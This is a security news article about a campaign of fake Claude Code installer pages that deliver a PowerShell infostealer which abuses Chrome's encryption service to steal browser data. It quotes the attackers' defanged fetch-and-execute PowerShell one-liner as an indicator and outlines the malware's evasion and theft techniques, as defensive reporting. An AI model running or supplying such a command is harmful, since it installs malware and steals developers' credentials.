HomeSecurityClaude Code: Fake installers install malware

Claude Code: Fake installers install malware

Developers searching the Internet for Anthropic's popular Claude Codemay be tricked into downloading malware. According to researchers at Ontinue, attackers are exploiting a fake Claude Code installer to deliver a PowerShell payload. The malware is designed to evade detection, recover browser encryption hardware, and steal sensitive data from developers' systems.

Claude Code

“Developers hold the keys to an organization’s most sensitive assets – intellectual property, cloud infrastructure, CI/CD pipelines,” said Vineeta Sangaraju, AI Research Engineer at Black Duck. “They also, by necessity, need the freedom to download and install software. This combination makes them a high-value target.”

Ontinue researchers said that anything detectable in the attack chain is wrapped inside the PowerShell loader, making detection complicated. “Two standard API-chain rule sets we evaluated against the binary returned no matches,” they said in a blog post.

See also: OpenAI Daybreak: The Answer to the Claude Mythos for Cybersecurity

The malware is enabled with “geographic exclusion”, which makes it scan Windows regions settings and compare them to a list of locations to exclude (all CIS member states and Iran). If there is a match, it immediately cancels the execution.

Fake Claude Code installation pages

According to Ontinue, the campaign relies on fake installation pages that impersonate Claude Code's distribution channels.

However, instead of delivering Anthropic’s legitimate one-line installation process, “irm https[:]//claude[.]ai/install.ps1 | iex“, the pages serve attacker-controlled PowerShell commands (“irm events[.]msft23[.]com | iex”) that start with a staged payload chain. Once executed, the malicious routine deploys multiple components intended to establish persistence while minimizing behavioral indicators typically associated with commodity malware loaders.

“Everything that is easily detectable, SQLite database access, archive construction, HTTPS extraction, scheduled-task persistence, and the process-injection chain itself, are located exclusively within the PowerShell loader,” the researchers said, adding that the native helper does not expose any networking, cryptographic, or file-enumeration imports. The only telltale sign is an indirect COM vtable invocation.

See also: Mini Shai-Hulud Worm: Infects TanStack, Mistral AI and other Packages

Claude Code: Fake installers install malware

What can malware do?

Some of the things that malware can do, while hiding from prying eyes, include geographic exclusion, ID collection, browser enumeration, v10/v20 key handling, PowerShell architecture matching and launch, decryption and collection, extraction, and persistence.

“ Replacing a legitimate installer with a malicious one is not a new attack,” Sangaraju pointed out. “However, what makes this current campaign remarkable is the precision with which it was constructed to evade the detection methods that most security teams rely on today. The malicious activity is intentionally structured to appear innocent to scanners.”

The researchers also wrote about the malware's abuse of Chrome Elevation Services to retrieve encryption material associated with Application-Bound Encryption (ABE) protections.

The payload exploits the IElevator2 COM interface in Chrome to retrieve encryption keys (ABE).

See also: cPanel vulnerability used to distribute Filemanager Backdoor

Selecting the team

🔒 Protect your privacy with Proton VPN

Swiss VPN from the creators of Proton Mail — strict no-logs policy, strong encryption, and built-in NetShield that blocks ads, trackers, & malware.

  • ✔ No-logs, based in Switzerland (except 14-Eyes)
  • ✔ NetShield: blocks ads, trackers & malicious domains
  • ✔ Covers all devices — free version available
Try Proton VPN for free — 30-day money-back guarantee →

The link is an affiliate link — SecNews may receive a commission at no additional cost to you. It does not affect the independence of our article writing.

Claude Code: Fake installers install malware

This feature helped attackers gain access to browser-protected data that is normally inaccessible to infostealers. Google introduced ABE in Chrome 127 in July 2024, specifically to prevent stealers from stealing cookies and stored passwords from SQLite databases.

A YARA ruleset and a set of indicators of violation (IOCs) have been published in GitHub repositories to aid in detection, with the researchers recommending an additional set of best practices.

📧
Subscribe to the SecNews Newsletter

The most important Security & Technology news in your Inbox.

Digital Fortress
Digital Fortresshttps://www.secnews.gr
Pursue Your Dreams & Live!

SEARCH

FOLLOW US

📧
Newsletter SecNews
The most important Security & Technology news in your inbox.

LIVE NEWS